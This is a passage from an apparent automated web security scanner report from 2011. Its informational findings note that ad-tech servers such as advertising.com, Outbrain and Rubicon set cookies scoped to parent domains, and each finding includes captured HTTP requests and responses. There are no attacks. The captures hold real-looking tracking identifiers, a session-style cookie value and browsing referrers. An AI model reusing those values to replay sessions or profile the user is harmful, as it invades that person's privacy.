rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="
If-Modified-Since: Mon, 02 May 2011 20:22:43 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9SEJaSpn5l5JKLO/s2zMplZx83H/TTC237PZPP4jKiBCFJaY5cZka6FAtm4beqRWw/7FAzLkWXPgIi8VcsaW5MDVtyvwUNDmfjnsZinmZmXPA2Xh4s3kYnwTAk95HpSVCJHpmM4f/oSj749Ef0YoEddWzhx0AIyJfNmub+lo3hCs8LnYwhKiCV9cxtsduDxbgKGig/xdEapIXSBKNatGNERzsnj+UNGdAHjvZtk857qAFI/JHp6anpYCWza055lSd/MLrRwSO48cnRouEsdtYk0zIftzb4efvXkFMCdtxKYjYztIAlrXjdirsdz57gxvCx+1yhN6nRBa64pN4S7uJitpEBm8dQSAyNDhHsGsJrNkCJ6ZxlEFDFsmCK0svzKYoQdP0S6423I9WAaEIx7VNodCRuTRBkeZ+XoWsZAth6Wn2VB1yhKUy7TTiQdZNlq/oSoNvFin7QOKtwsLHS9KAG49pJzF1zGo9QMgH87vcuf0MBW3G1uzFmAnzhns2ko4vHbUWexJEzgmNSLWyE+lNuPVpV7NG0ZP21fZls7cB+zhzBIR0A4vTymhUJFNDbvZLFJ0o2EneEwSVC97z152JrWrbEoJIqN4LiE/kfxgqrEfAm4BtWxi9g+lPpPL1U4pv3QxsQQA8bzanIEAyROb1yf1vsHwkssVmYY+3jrig+V236VnjX2k9ouoIDbjDp/WY3Y9uozUmChz+zRhYuN6g3ADifa6eZMXP8bjtRV1B3cptMvwccSdg17f1pWL0bC2MTo2ErViU+pVctOxMQAX9plYHFyRApfdiF1SlRYrNpzZWCdqNaMSNSSlLIL3fuVqv/f7u73RFXDKULQmNSMrd1AVabiZA6OOyU/6bu85OJZqr/C2F/OvpuK5tkLNi90yZ+WJbAGQMUaIjMrV6iOZuI20ZaOS911V4fiL8G8OzG9ZlCWx6zlHhlLQfp28njBTFI0iVbCusNtZfgjV/u/iSefKfyukOzZNRr7xmBLPUMvameG/FqAaZVCsJgFcypU9TDn+r7xiiqWUJ1jWHFMKCRAKVu1ChD0Od5sq8yBqCUkxNY0bXY4czRVwBjvWG9X+O5+cOsWxMGhVddhPq4WawXVbRElO5vLKUQHXwhmSfhgZT+8stt8pSsaESu9rAbSc7LZurZ+HAxsgb1IbVaMzNxs1M2gZJdi46mkSC0Z7NNdB9jr7k2rUccIXsJbMfiyckH2iDQKWc4xECU/e8H8HfcHHw7vrTtoOQqqfdD6OmvM=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:31 GMT; Path=/
Last-Modified: Mon, 09 May 2011 13:59:31 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 09 May 2011 14:59:31 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:30 GMT
Content-Length: 5035

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'B08725';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
9.55. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,51134,50086,50085,53380,60490,60512,50963,52615,60491,50507,53656,55401,60509,57094,50961,52841,51182,56419,54032,51186,56988,56673,56148,57362,56969,60203,56835,56987,56780,50220,56768,56299,56761,54057,56681&guidm=1:16r4opq1tvlkml&bnum=23230 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=MzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; GUID=MTMwNDkwMjg2MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 14:59:55 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
9.56. http://newspaper.app40.ur.gcion.com/GCION.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newspaper.app40.ur.gcion.com
Path:   /GCION.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GCION.ashx?q=5&Segment=D08734_70008%7CD08734_72078&CacheDefeat=1304949583122 HTTP/1.1
Host: newspaper.app40.ur.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rsi_segs=D08734_70008|D08734_72078; domain=.gcion.com; expires=Tue, 08-May-2012 13:59:45 GMT; path=/
Cache-Control: private
Content-Length: 0

9.57. http://odb.outbrain.com/utils/odb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:34 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:34 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: recs="FV47GVeXROTRQDQGso7n7BJgimfU4hutZsi+REu/kRSXRrfTy1nLEJ07hVMifX9qva0UddJWrWk="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:34 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:33 GMT
Content-Length: 3991

GEL.thepage.pageinfo.outbrain.init({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1f9a95338cac93e0d7953f1aee6ee9d4'},'score':{'prefe
...[SNIP]...
9.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949889^1304949889&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
9.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64663; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949736^1304949736; expires=Mon, 16-May-2011 14:02:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
9.60. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64389; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950010^1304950010&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:06:50 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
9.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; 